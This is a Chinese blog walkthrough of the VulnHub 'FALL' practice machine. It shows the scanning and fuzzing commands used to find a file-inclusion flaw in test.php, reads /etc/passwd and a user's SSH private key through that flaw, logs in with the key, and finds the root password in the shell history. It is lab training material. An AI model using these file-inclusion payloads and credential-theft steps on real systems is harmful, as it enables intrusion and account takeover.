• vulnhub之FALL


    vulnhub之fall
    下载地址
    难度:so easy
    主机发现

    netdiscover
    nmap -sP 192.168.2.0/24
    
    • 1
    • 2

    发现目的ip为192.168.2.5
    进行全端口扫描

    nmap -p- -T4 -A 192.168.2.5
    
    • 1

    在这里插入图片描述发现80端口开放网路服务,
    使用gobuster进行目录扫描

    gobuster dir -u http://192.168.2.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
    
    • 1

    在这里插入图片描述发现存在test.php,访问发现,页面提示需要参数,
    在这里插入图片描述这里采用fuzz探测所需参数,这里介绍两种方法,第一种是burpsuite设置参数进行暴力破解,第二种是采用wfuzz或者ffuf等工具进行实现,这里提供下简单的命令,详细使用方法会在下一篇进行描述
    字典文件自行获取

    wfuzz
    wfuzz -u 192.168.2.5/test.php?FUZZ=/etc/passwd  -w user.txt --hh 80
    ffuf
    ffuf -c -w user.txt -u 'http://192.168.2.5/test.php?FUZZ=/etc/passwd' -fs 80
    
    • 1
    • 2
    • 3
    • 4

    获取到参数为file

    在这里插入图片描述因为目标的ssh开放,这里尝试获取目标的用户名以及密码,使用文件包含查看目标的/etc/passwd文件
    在这里插入图片描述这里解释一下,由于/etc/passwd数据的划分,
    在这里插入图片描述由于qiu用户的命令解释器为/bin/bash,根据划分,qiu属于正常用户,所以采用该用户名进行利用
    ssh登录的话可以采取两种方式,第一种为账号密码,第二种为id_rsa即公钥私钥文件进行登录,这里获取qiu用户的id_rsa文件进行登录,使用文件包含获取文件,
    在这里插入图片描述保存为文件,这里命名为sskey,值得注意的是,需要全部复制,从——开始到——结束,然后使用命令ssh -i sskey qiu@192.168.2.5 进行登录
    在这里插入图片描述cat .bash_history 这里查看历史命令发现

    在这里插入图片描述echo "remarkablyawesomE" | sudo -S dnf update
    该命令为输入root用户密码,进行系统更新,所以这里的remarkablyawesomE为root密码,所以
    qiu用户sudo su切换root用户即可

  • 相关阅读:
    Spring教程-01-IOC控制反转
    亚马逊云科技面向 macOS 的 Amazon 云服务器 EC2 M1 Mac 实例
    SpringBoot运行原理
    java ssm游戏开发项目进度管理控制系统
    2023CSPJ 旅游巴士 —— dijkstra
    React之Hook
    直播课堂系统07-讲师管理模块前端
    冒泡排序c++
    [附源码]计算机毕业设计JAVA企业公开招聘系统
    基于Java的二手交易市场系统设计与实现
  • 原文地址:https://blog.csdn.net/qq_54030686/article/details/127549066